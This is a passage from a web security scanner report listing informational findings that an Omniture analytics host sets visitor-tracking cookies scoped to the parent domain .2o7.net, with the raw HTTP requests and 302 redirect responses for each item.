Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www339
Content-Length: 0
Content-Type: text/plain
Connection: close

16.115. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s43305702756624

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43305702756624 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close

16.116. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s43513301596976

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43513301596976 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www320
Content-Length: 0
Content-Type: text/plain
Connection: close

16.117. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s43547210348770

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43547210348770 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www277
Content-Length: 0
Content-Type: text/plain
Connection: close

16.118. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s4364950429648

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4364950429648 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www431
Content-Length: 0
Content-Type: text/plain
Connection: close

16.119. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s43829343500547

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s43829343500547 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www37
Content-Length: 0
Content-Type: text/plain
Connection: close

16.120. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s4407522239256

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4407522239256 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www25
Content-Length: 0
Content-Type: text/plain
Connection: close

16.121. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s4419304328970

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4419304328970 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www280
Content-Length: 0
Content-Type: text/plain
Connection: close

16.122. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s4424447611439

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s4424447611439 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www378
Content-Length: 0
Content-Type: text/plain
Connection: close

16.123. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s44325433499179

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s44325433499179 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www65
Content-Length: 0
Content-Type: text/plain
Connection: close

16.124. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sportingnews.122.2o7.net
Path:	/b/ss/spnprod/1/H.15.1/s44696885943412

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s44696885943412 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
